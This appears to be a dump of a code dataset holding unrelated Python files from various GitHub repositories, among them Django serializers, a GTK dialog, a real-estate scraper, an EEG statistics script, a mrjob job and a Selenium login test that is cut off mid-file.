create_response_if_not_empty(response_data, StudentAffairsResponse, students_affairs)\n instance.students_affairs = students_affairs\n return instance\nclass AdminWorkersEvaluationFormSerializer(ModelSerializer):\n workers_affairs = AdminWorkersAffairsSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','workers_affairs']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n workers_affairs_data = validated_data.pop('workers_affairs')\n response_data = workers_affairs_data.pop('response')\n workers_affairs = WorkersAffairs.objects.get(pk = instance.workers_affairs.id)\n try:\n if instance.workers_affairs.response:\n update_response_if_not_empty(response_data, WorkersAffairsResponse, workers_affairs)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, WorkersAffairsResponse, workers_affairs)\n instance.workers_affairs = workers_affairs\n return instance\n\nclass AdminTrainingEvaluationFormSerializer(ModelSerializer):\n training = AdminTrainingSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','training']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n training_data = validated_data.pop('training')\n response_data = training_data.pop('response')\n training = Training.objects.get(pk = instance.training.id)\n try:\n if instance.training.response:\n update_response_if_not_empty(response_data, TrainingResponse, training)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, TrainingResponse, training)\n instance.training = training\n return instance\n\nclass AdminNutritionEvaluationFormSerializer(ModelSerializer):\n nutrition = AdminNutritionSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','nutrition']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n nutrition_data = validated_data.pop('nutrition')\n response_data = nutrition_data.pop('response')\n nutrition = Nutrition.objects.get(pk = instance.nutrition.id)\n try:\n if instance.nutrition.response:\n update_response_if_not_empty(response_data, NutritionResponse, nutrition)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, NutritionResponse, nutrition)\n instance.nutrition = nutrition\n return instance\n\nclass AdminEnvironmentPopulationEvaluationFormSerializer(ModelSerializer):\n environment_population = AdminEnvironmentPopulationSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','environment_population']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n environment_data = validated_data.pop('environment_population')\n response_data = environment_data.pop('response')\n environment = EnvironmentPopulation.objects.get(pk = instance.environment.id)\n try:\n if instance.environment.response:\n update_response_if_not_empty(response_data, EnvironmentPopulationResponse, environment)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, EnvironmentPopulationResponse, environment)\n instance.environment = environment\n return instance\n \nclass AdminCooperativeEvaluationFormSerializer(ModelSerializer):\n cooperative = AdminCooperativeSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','cooperative']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n cooperative_data = validated_data.pop('cooperative')\n response_data = cooperative_data.pop('response')\n cooperative = Cooperative.objects.get(pk = instance.cooperative.id)\n try:\n if instance.cooperative.response:\n update_response_if_not_empty(response_data, CooperativeResponse, cooperative)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, CooperativeResponse, cooperative)\n instance.cooperative = cooperative\n return instance\n\nclass AdminProductionUnitEvaluationFormSerializer(ModelSerializer):\n production_unit = AdminProductionUnitSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','production_unit']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n production_unit_data = validated_data.pop('production_unit')\n response_data = production_unit_data.pop('response')\n production_unit = ProductionUnit.objects.get(pk = instance.production_unit.id)\n try:\n if instance.production_unit.response:\n update_response_if_not_empty(response_data, ProductionUnitResponse, production_unit)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, ProductionUnitResponse, production_unit)\n instance.production_unit = production_unit\n return instance\n\nclass AdminSecuritySafetyEvaluationFormSerializer(ModelSerializer):\n security_safety = AdminSecuritySafetySerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','security_safety']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n security_safety_data = validated_data.pop('security_safety')\n response_data = security_safety_data.pop('response')\n security_safety = SecuritySafety.objects.get(pk = instance.security_safety.id)\n try:\n if instance.security_safety.response:\n update_response_if_not_empty(response_data, SecuritySafetyResponse, security_safety)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, SecuritySafetyResponse, security_safety)\n instance.security_safety = security_safety\n return instance\n\nclass AdminTeachersEvaluationFormSerializer(ModelSerializer):\n teachers = AdminTeachersSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','teachers']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n teachers_data = validated_data.pop('teachers')\n response_data = teachers_data.pop('response')\n teachers = Teachers.objects.get(pk = instance.teachers.id)\n try:\n if instance.teachers.response:\n update_response_if_not_empty(response_data, TeachersResponse, teachers)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, TeachersResponse, teachers)\n instance.teachers = teachers\n return instance\n\nclass AdminStrategicPlanningEvaluationFormSerializer(ModelSerializer):\n strategic_planning = AdminStrategicPlanningSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','strategic_planning']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n strategic_planning_data = validated_data.pop('strategic_planning')\n response_data = strategic_planning_data.pop('response')\n strategic_planning = StrategicPlanning.objects.get(pk = instance.strategic_planning.id)\n try:\n if instance.strategic_planning.response:\n update_response_if_not_empty(response_data, StrategicPlanningResponse, strategic_planning)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, StrategicPlanningResponse, strategic_planning)\n instance.strategic_planning = strategic_planning\n return instance\n\nclass AdminAdministrationEvaluationFormSerializer(ModelSerializer):\n administration = AdminAdministrationSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','administration']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n administration_data = validated_data.pop('administration')\n response_data = administration_data.pop('response')\n administration = Administration.objects.get(pk = instance.administration.id)\n try:\n if instance.administration.response:\n update_response_if_not_empty(response_data, AdministrationResponse, administration)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, AdministrationResponse, administration)\n instance.administration = administration\n return instance\n\nclass AdminQualityEvaluationFormSerializer(ModelSerializer):\n quality = AdminQualitySerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','quality']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update (self, instance,validated_data):\n quality_data = validated_data.pop('quality')\n response_data = quality_data.pop('response')\n quality = Quality.objects.get(pk = instance.quality.id)\n try:\n if instance.quality.response:\n update_response_if_not_empty(response_data, QualityResponse, quality)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, QualityResponse, quality)\n instance.quality = quality\n return instance\n\nclass AdminDecentralizationEvaluationFormSerializer(ModelSerializer):\n decentralization = AdminDecentralizationSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','decentralization']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n decentralization_data = validated_data.pop('decentralization')\n response_data = decentralization_data.pop('response')\n decentralization = Decentralization.objects.get(pk = instance.decentralization.id)\n try:\n if instance.decentralization.response:\n update_response_if_not_empty(response_data, DecentralizationResponse, decentralization)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, DecentralizationResponse, decentralization)\n instance.decentralization = decentralization\n return instance\n\nclass AdminLaboratoriesEvaluationFormSerializer(ModelSerializer):\n laboratories = AdminLaboratoriesSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','laboratories']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n laboratories_data = validated_data.pop('laboratories')\n response_data = laboratories_data.pop('response')\n laboratories = Laboratories.objects.get(pk = instance.laboratories.id)\n try:\n if instance.laboratories.response:\n update_response_if_not_empty(response_data, LaboratoriesResponse, laboratories)\n except ObjectDoesNotExist:\n create_response_if_not_empty(response_data, LaboratoriesResponse, laboratories)\n instance.laboratories = laboratories\n return instance","repo_name":"zico-son/Educational-Administration-Tracker-System","sub_path":"EvaluateHub/admin_serializers.py","file_name":"admin_serializers.py","file_ext":"py","file_size_in_byte":21567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39846115033","text":"import logging\nimport pygtk\npygtk.require('2.0')\n\nimport gtk\nimport gconf\nimport gobject\n\nclass PreferencesBox(gobject.GObject):\n __gsignals__ = {\n 'new-preferences':(gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_GSTRING, gobject.TYPE_GSTRING,)),\n }\n \n archs = {\n 'stable':['alpha','amd64','arm','hppa','i386','ia64','mips','mipsel','powerpc','s390','sparc'],\n 'testing':['alpha','amd64','arm','armel','hppa','i386','ia64','mips','mipsel','powerpc','s390','sparc'],\n 'unstable':['alpha','amd64','arm','armel','hppa','hurd-i386','i386','ia64','m68k','mips','mipsel','powerpc','s390','sparc']}\n\n def __init__(self, paths, distro, arch):\n gobject.GObject.__init__(self)\n self.current_distro = distro\n self.current_arch = arch\n self.gui = gtk.Builder()\n self.gui.add_from_file(paths.get_in_data_path('debweather.ui'))\n self.dlg_prefs = self.gui.get_object('dlg_prefs')\n self.btn_apply = self.gui.get_object('btn_apply')\n self.cmb_distro = self.gui.get_object('cmb_distro')\n self.cmb_arch = self.gui.get_object('cmb_arch')\n self.lst_distros = self.cmb_distro.get_model()\n self.lst_archs = self.cmb_arch.get_model()\n distro_cell = gtk.CellRendererText()\n arch_cell = gtk.CellRendererText()\n self.cmb_distro.pack_start(distro_cell, True)\n self.cmb_distro.add_attribute(distro_cell, 'text', 0) \n self.cmb_arch.pack_start(arch_cell, True)\n self.cmb_arch.add_attribute(arch_cell, 'text', 0) \n self.gui.connect_signals(self)\n\n def set_current_distro(self, distro):\n self.current_distro = distro\n \n def set_current_arch(self, arch):\n self.current_arch = arch\n\n def show(self):\n for i,d in enumerate(self.lst_distros):\n if d[0] == self.current_distro:\n self.cmb_distro.set_active(i)\n\n self.lst_archs.clear()\n for i,arch in enumerate(self.archs[self.current_distro]):\n self.lst_archs.append([arch])\n logging.debug('Appending arch: %s' % arch)\n if arch == self.current_arch:\n self.cmb_arch.set_active(i)\n self.btn_apply.set_sensitive(False)\n self.dlg_prefs.show()\n\n def on_cmb_distro_changed(self, widget):\n self.lst_archs.clear()\n current_distro = self.lst_distros[self.cmb_distro.get_active()][0]\n for i,arch in enumerate(self.archs[current_distro]):\n self.lst_archs.append([arch])\n logging.debug('Appending arch: %s' % arch)\n\n self.btn_apply.set_sensitive(False)\n logging.debug(\"Distro changed\")\n\n def on_cmb_arch_changed(self, widget):\n logging.debug(\"Arch changed\")\n self.btn_apply.set_sensitive(True)\n\n def on_btn_apply_clicked(self, widget):\n logging.debug(\"Apply\")\n distro = self.cmb_distro.get_active_text()\n arch = self.cmb_arch.get_active_text()\n conf_client = gconf.client_get_default()\n if conf_client.dir_exists('/apps/debian-weather-applet'):\n conf_client.set_string('/apps/debian-weather-applet/distro', distro)\n conf_client.set_string('/apps/debian-weather-applet/arch', arch)\n self.emit('new-preferences', distro, arch)\n self.dlg_prefs.hide()\n\n def on_btn_cancel_clicked(self, widget):\n logging.debug(\"Cancel\")\n self.dlg_prefs.hide()\n\ngobject.type_register(PreferencesBox)\n","repo_name":"denever/debweather","sub_path":"debweatherlib/preferencesbox.py","file_name":"preferencesbox.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"35150636640","text":"# wyklad 3 zad 1\n\nfrom math import gcd\n\nclass MyFraction():\n def __init__(self, numerator, denominator = 1):\n self.numerator = int(numerator / gcd(numerator, denominator))\n self.denominator = int(denominator / gcd(numerator, denominator))\n \n def __add__(self, other):\n if type(other) == int:\n n = self.numerator + self.denominator * other\n d = self.denominator\n else:\n n = self.numerator * other.denominator + self.denominator * other.numerator\n d = self.denominator * other.denominator\n return MyFraction(n, d)\n \n def __eq__(self, other):\n return((self.numerator==other.numerator)*(self.denominator==other.denominator))\n \n def __iadd__(self, other):\n if type(other) == int:\n n = self.numerator + self.denominator * other\n d = self.denominator\n else:\n sn = self.numerator \n sd = self.denominator \n on = other.numerator \n od = other.denominator\n n = (sn*od + sd*on)\n d = sd * od \n self.numerator = n / gcd(n,d)\n self.denominator = d / gcd(n,d)\n return self\n \n def __radd__(self, other):\n if type(other) == int:\n n = self.numerator + self.denominator * other\n d = self.denominator\n else:\n n = self.numerator * other.denominator + self.denominator * other.numerator\n d = self.denominator * other.denominator\n return MyFraction(n,d)\n \n def __repr__(self):\n return '{}(numerator={}, denominator={})'.format(\n self.__class__.__name__, self.numerator, self.denominator)\n \n def __str__(self): \n return '{}(numerator={}, denominator={})'.format(\n self.__class__.__name__, self.numerator, self.denominator)\n##### model solution written by thee teacher \n\nimport math\n\n\nclass MyFraction:\n\tdef __init__(self, numerator, denominator=1):\n\t\tif isinstance(numerator, MyFraction):\n\t\t\tself.numerator = numerator.numerator\n\t\t\tself.denominator = numerator.denominator\n\t\telse:\n\t\t\tself.numerator = numerator\n\t\t\tself.denominator = denominator\n\t\tself._reduce()\n\n\tdef _reduce(self):\n\t\tnd_gcd = math.gcd(\n\t\t\tself.numerator, self.denominator\n\t\t)\n\t\tself.numerator //= nd_gcd\n\t\tself.denominator //= nd_gcd\n\n\tdef _inner_add(self, other):\n\t\tother = MyFraction(other)\n\t\t# a/b + c/d = (a*d + c*b)/(b*d) = g/h\n\t\ta = self.numerator\n\t\tb = self.denominator\n\t\tc = other.numerator\n\t\td = other.denominator\n\t\tg = a*d + c*b\n\t\th = b*d\n\t\treturn g, h\n\n\n\tdef __add__(self, other):\n\t\tg, h = self._inner_add(other)\n\t\treturn MyFraction(g, h)\n\n\tdef __eq__(self, other):\n\t\treturn (\n\t\t\tself.numerator == other.numerator\n\t\t\tand self.denominator == other.denominator\n\t\t)\n\n\tdef __iadd__(self, other):\n\t\tself.numerator, self.denominator = self._inner_add(other)\n\t\tself._reduce()\n\t\treturn self\n\n\tdef __radd__(self, other):\n\t\treturn self + other\n\n\tdef __repr__(self):\n\t\treturn '{}(numerator={}, denominator={})'.format(\n\t\t\tself.__class__.__name__,\n\t\t\tself.numerator,\n\t\t\tself.denominator\n\t\t)\n","repo_name":"Lozdowski/daftacademy-python4beginners","sub_path":"Lecture_03/L03_task_01.py","file_name":"L03_task_01.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70661295405","text":"#exercio pag 27 - bookintrod linguagem python\r\n#exempli manipulaçãobasica de exceção - try and except\r\ns = input (\"enter an integer: \")\r\ntry:\r\n i = int (s)\r\n print (\"valid integer entered: \", i)\r\nexcept ValueError as err:\r\n print(err)\r\n\r\n\r\n\r\n","repo_name":"dgrej/python-study","sub_path":"PensePython/1_try_and_except.py","file_name":"1_try_and_except.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32341383387","text":"# import library\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\nfrom urllib.request import Request\nimport re\nfrom database_connect import insert_data, export_database_to_csv_file\n\n\n\nfor page_number in range(1,10):\n\n # connect to website redfin and read html file\n url_test = f'https://www.redfin.com/city/29470/IL/Chicago/page-{page_number}'\n # url_test = f'https://www.redfin.com/city/29470/IL/Chicago/page-'\n\n site = url_test\n hdr = {'User-Agent': 'Mozilla/5.0'}\n req = Request(site, headers=hdr)\n page = urlopen(req)\n soup = BeautifulSoup(page)\n\n # extract data for feature home (number bads, number baths, area)\n feature_homes = soup.findAll('div', attrs={'class':'HomeStatsV2 font-size-small'})\n # extract data for prices\n prices = soup.findAll('span', attrs={'class':\"homecardV2Price\"})\n # extract data for address\n address_s = soup.findAll('div',attrs={'class':'homeAddressV2'})\n \n \n for count in range(len(feature_homes)):\n \n item = feature_homes[count]\n price = prices[count]\n address = address_s[count]\n \n # extract city or region in address text\n address_s__ = address.text\n address_s_l = address_s__.split(',')[-2]\n \n # convert price string format to similar int\n price = price.text\n price_ = re.sub('\\$', '', str(price))\n price_ = re.sub(',', '', str(price_))\n \n # extract number bads, number baths, area from feature_homes \n beds_item = item.findAll('div', attrs={'class':'stats'})[0].string\n baths_items = item.findAll('div', attrs={'class':'stats'})[1].string\n area_Sq_item = item.findAll('div', attrs={'class':'stats'})[2].string\n \n # convert beds_item string format to similar int\n beds_item = re.sub(' Beds', '', str(beds_item))\n beds_item = re.sub(' Bed', '', beds_item)\n \n # convert baths_items string format to similar int\n baths_items = re.sub(' Baths', '', str(baths_items))\n baths_items = re.sub(' Bath', '', baths_items)\n \n # convert area_Sq_item string format to similar int\n area_Sq_item = re.sub(' Sq. Ft.', '', str(area_Sq_item))\n area_Sq_item = re.sub(',', '.', str(area_Sq_item))\n\n insert_data(area=area_Sq_item, number_bedrooms=beds_item, number_bath=baths_items, property_address=address_s_l, price=price_)\n\n\n\n# export all data table feature home to ","repo_name":"HaniehKhalesi/predict-price-home-with-machine-learning","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7621120147","text":"import numpy as np\nimport mne\nfrom cnx_utils import load_sparse, phi\nimport argparse\nimport pickle\nfrom statsmodels.regression.mixed_linear_model import MixedLM\nfrom mne.stats.cluster_level import _setup_connectivity, _find_clusters, \\\n _reshape_clusters\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef mass_uv_mixedlmm(formula, data, uv_data, group_id, re_formula=None):\n mods = []\n for d_idx in range(uv_data.shape[1]):\n print(\"{} of {}\".format(d_idx, uv_data.shape[1]), end=\"\\r\")\n data_temp = data.copy()\n data_temp[\"Brain\"] = uv_data[:,d_idx]\n model = MixedLM.from_formula(formula, data_temp, groups=group_id)\n try:\n mod_fit = model.fit()\n except:\n mods.append(None)\n continue\n mods.append(mod_fit)\n return mods\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--perm', type=int, default=500)\nparser.add_argument('--iter', type=int, default=0)\nparser.add_argument('--band', type=str, required=True)\nopt = parser.parse_args()\n\nsubjs = [\"ATT_10\", \"ATT_11\", \"ATT_12\", \"ATT_13\", \"ATT_14\", \"ATT_15\", \"ATT_16\",\n \"ATT_17\", \"ATT_18\", \"ATT_19\", \"ATT_20\", \"ATT_21\", \"ATT_22\", \"ATT_23\",\n \"ATT_24\", \"ATT_25\", \"ATT_26\", \"ATT_28\", \"ATT_31\", \"ATT_33\", \"ATT_34\",\n \"ATT_35\", \"ATT_36\", \"ATT_37\"]\n\nband_info = {}\nband_info[\"theta_0\"] = {\"freqs\":list(np.arange(3,7)),\"cycles\":3}\nband_info[\"alpha_0\"] = {\"freqs\":list(np.arange(7,10)),\"cycles\":5}\nband_info[\"alpha_1\"] = {\"freqs\":list(np.arange(10,13)),\"cycles\":7}\nband_info[\"beta_0\"] = {\"freqs\":list(np.arange(13,22)),\"cycles\":9}\nband_info[\"beta_1\"] = {\"freqs\":list(np.arange(22,31)),\"cycles\":9}\nband_info[\"gamma_0\"] = {\"freqs\":list(np.arange(31,41)),\"cycles\":9}\nband_info[\"gamma_1\"] = {\"freqs\":list(np.arange(41,60)),\"cycles\":9}\nband_info[\"gamma_2\"] = {\"freqs\":list(np.arange(60,91)),\"cycles\":9}\n\n# parameters and setup\nroot_dir = \"/home/jeff/ATT_dat/\"\n#root_dir = \"/scratch/jeffhanna/ATT_dat/\"\nproc_dir = root_dir + \"proc/\"\nspacing = \"ico4\"\nconds = [\"rest\",\"audio\",\"visual\",\"visselten\",\"zaehlen\"]\nwavs = [\"4000Hz\",\"4000cheby\",\"7000Hz\",\"4000fftf\"]\nband = opt.band\nindep_var = None\nperm_n = opt.perm\n\ndf_laut = pd.read_pickle(root_dir+\"behave/laut\")\ndf_ang = pd.read_pickle(root_dir+\"behave/ang\")\n\npredictor_vars = [\"Laut\",\"Subj\",\"Block\",\"Wav\"]\ndm_laut = df_laut.copy()[predictor_vars]\n\npredictor_vars = [\"Angenehm\",\"Subj\",\"Block\",\"Wav\"]\npredictor_vars = [\"Subj\",\"Block\"]\ndm_ang = df_ang.copy()[predictor_vars]\n\nif indep_var == \"Angenehm\":\n dm = dm_ang\nelif indep_var == \"Laut\":\n dm = dm_laut\nelse:\n dm = None\n\ndata = []\ndm_new = pd.DataFrame(columns=predictor_vars)\nidx_borders = []\nidx_border = 0\ngroup_id = []\nfor sub_idx,sub in enumerate(subjs):\n idx_borders.append([idx_border])\n # make the df and data object for this particular subject\n for cond_idx,cond in enumerate(conds):\n data_temp = load_sparse(\"{}nc_{}_{}_dPTE_{}.sps\".format(proc_dir,\n sub, cond,\n band))\n for epo_idx in range(data_temp.shape[0]):\n if indep_var:\n sel_inds = (dm[\"Block\"]==cond) & (dm[\"Subj\"]==sub)\n dm_new = dm_new.append(dm[sel_inds])\n else:\n dm_new = dm_new.append({\"Subj\":sub, \"Block\":cond}, ignore_index=True)\n data.append(phi(data_temp[epo_idx,], k=1))\n group_id.append(sub_idx)\n idx_border += 1\n idx_borders[-1].append(idx_border)\ndata = np.array(data)\ngroup_id = np.array(group_id)\nif indep_var:\n col_idx = dm_new.columns.get_loc(indep_var)\nelse:\n col_idx = 1\n\nif indep_var:\n formula = \"Brain ~ {} + Block\".format(indep_var)\nelse:\n formula = \"Brain ~ C(Block, Treatment('rest'))\"\n\n# # get main result\n# mods = mass_uv_mixedlmm(formula, dm_new, data, group_id)\n# for mod_idx,mod in enumerate(mods):\n# mod.save(\"{}{}/reg70_lmm_{}.pickle\".format(proc_dir,opt.band,mod_idx))\n\n# permute\nall_perm_tvals = [[],[],[],[]]\nfor i in range(perm_n):\n print(\"Permutation {} of {}\".format(i, perm_n))\n dm_perm = dm_new.copy()\n for idx_border in idx_borders:\n if indep_var:\n temp_slice = dm_perm[indep_var][idx_border[0]:idx_border[1]].copy()\n else:\n temp_slice = dm_perm[\"Block\"][idx_border[0]:idx_border[1]].copy()\n temp_slice = temp_slice.sample(frac=1)\n dm_perm.iloc[idx_border[0]:idx_border[1],col_idx] = temp_slice.values\n perm_mods = mass_uv_mixedlmm(formula, dm_perm, data, group_id)\n for pm in perm_mods:\n all_perm_tvals[0].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.audio]\"))\n all_perm_tvals[1].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.visselten]\"))\n all_perm_tvals[2].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.visual]\"))\n all_perm_tvals[3].append(pm.tvalues.get(\"C(Block, Treatment('rest'))[T.zaehlen]\"))\nall_perm_tvals = np.array(all_perm_tvals)\nnp.save(\"{}cnx_{}_{}_perm_{}_{}.npy\".format(proc_dir, indep_var, band, perm_n, opt.iter),\n all_perm_tvals)\n","repo_name":"TinnErlangen/ATT","sub_path":"cnx/cnx_lmm_permute_hpc.py","file_name":"cnx_lmm_permute_hpc.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4424555399","text":"import json\nfrom collections import defaultdict\n\nsplit = \"test\"\nwith open(f\"{split}.json\", 'r') as f:\n data = json.load(f)\n\n# question_type_split = defaultdict(list)\ntokens = defaultdict(int)\nfor d in data:\n for token in d[\"answer\"].split():\n tokens[token] += 1\n for sent in d[\"alter_answers\"]:\n for token in sent.split():\n tokens[token] += 1\n\nsorted_tokens = {k: v for k, v in sorted(tokens.items(), key=lambda item: item[1])}\n\nprint(sorted_tokens)\n\n# for t, itms in question_type_split.items():\n # print(f\"{t}: {len(itms)}\")\n # print(f\"{t}: {sum(itms)/len(itms)}\")\n\n# for t, itms in question_type_split.items():\n# with open(f\"{split}_{t}.json\", 'w') as f:\n# json.dump(itms, f, indent=4)","repo_name":"MichiganNLP/In-the-wild-QA","sub_path":"src/example_data/wildQA-data/examine.py","file_name":"examine.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"9369864843","text":"from mrjob.job import MRJob\r\nimport re\r\n\r\nclass CoTermNSPair(MRJob):\r\n\r\n def mapper(self, _, line):\r\n words = re.split(\"[ *$&#/\\t\\n\\f\\\"\\'\\\\,.:;?!\\[\\](){}<>~\\-_]\", line.lower())\r\n words = list(filter(None, words))\r\n\r\n for i, word in enumerate(words):\r\n wordList = words[i+1:len(words)]\r\n # Generate a pair of (w, u) where u appears after w in words\r\n pairList = self.pairGen(word,wordList)\r\n for pair in pairList:\r\n yield(pair, 1) \r\n\r\n def reducer(self, pair, counts):\r\n yield(pair, sum(counts))\r\n\r\n # Given a word and a list of words, return a list of pairs\r\n def pairGen(self, w, words):\r\n pairList = []\r\n for u in words:\r\n pair = w + \" \" + u\r\n pairList.append(pair)\r\n return pairList\r\n\r\nif __name__ == '__main__':\r\n\r\n CoTermNSPair.run()\r\n","repo_name":"Abdullah527382/comp9313-revision","sub_path":"mapreduce/lab03/mr_CoTermNSPair.py","file_name":"mr_CoTermNSPair.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35991067961","text":"import pickle\n\ndataDict = {}\n\ndef write():\n global dataDict\n f = open(\"data.dat\", \"ab\")\n n = int(input(\"Enter number of students : \"))\n while(n!=0):\n rollNumber = input(\"Enter roll number : \")\n studentName = input(\"Enter student name : \")\n dataDict[rollNumber] = studentName\n n-=1\n pickle.dump(dataDict, f)\n dataDict = {}\n f.close()\n\ndef read():\n print(\"Get info about student\")\n try:\n f = open(\"data.dat\", \"rb\")\n except FileNotFoundError:\n print(\"Please enter data first!\")\n quit()\n data = pickle.load(f)\n rollNumber = input(\"Enter roll number : \")\n if rollNumber not in data.keys():\n print(\"This roll number does not exist.\")\n else:\n print(\"Student name : \", data[rollNumber],)\n f.close()\n\n\nwrite()\nwhile(True):\n read()","repo_name":"delta911ee/homeworks","sub_path":"Report/program3.py","file_name":"program3.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7184347540","text":"import webapp2\nimport json\nimport re\nimport urllib\nimport logging\n\nclass SoundcloudCrawlerHandler(webapp2.RequestHandler):\n\tdef get(self, permalink):\n\t\tpermalink_url = \"http://soundcloud.com/\" + permalink\n\t\ttwitter = None\n\t\t\n\t\tfile = urllib.urlopen(permalink_url)\n\t\ttry:\n\t\t\tpage = file.read()\n\t\tfinally:\n\t\t\tfile.close()\n\t\t\t\t\t\n\t\tresult = re.search(r'a\\shref=\\\"https?:\\/\\/w?w?w?\\.?twitter\\.com\\/?#?!?\\/(\\w+)\\\"\\sclass=\\\"twitter\\s\\\"', page)\n\t\tif(result):\n\t\t\ttwitter = result.group(1)\n\t\t\t\t\n\t\tresponse = {\n\t\t\t\"twitter\" : twitter,\n\t\t}\n\t\t\n\t\tself.response.out.write(json.dumps(response))","repo_name":"detcherry/phonoblaster","sub_path":"controllers/crawler/soundcloud.py","file_name":"soundcloud.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"23093639689","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom config import valid_email, valid_password, base_url\r\n\r\n\r\n@pytest.fixture(autouse=True)\r\ndef test_driver():\r\n driver = webdriver.Chrome('C:/Users/Flame/PycharmProjects/chromedriver.exe')\r\n driver.implicitly_wait(5)\r\n driver.get(f'{base_url}login')\r\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.ID, 'email'))).send_keys(valid_email)\r\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.ID, 'pass'))).send_keys(valid_password)\r\n driver.find_element(By.CSS_SELECTOR, 'button[type=\"submit\"]').click()\r\n\r\n assert driver.find_element(By.TAG_NAME, 'h1').text == 'PetFriends'\r\n\r\n yield\r\n\r\n driver.quit()\r\n\r\n\r\n# явные ожидания, проверка карточек питомцев\r\n\r\ndef test_web_driver_wait(test_driver):\r\n images = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-img-top'))\r\n )\r\n names = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-body .card-title'))\r\n )\r\n descriptions = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-body .card-text'))\r\n )\r\n\r\n src_images = [i.get_attribute('src') 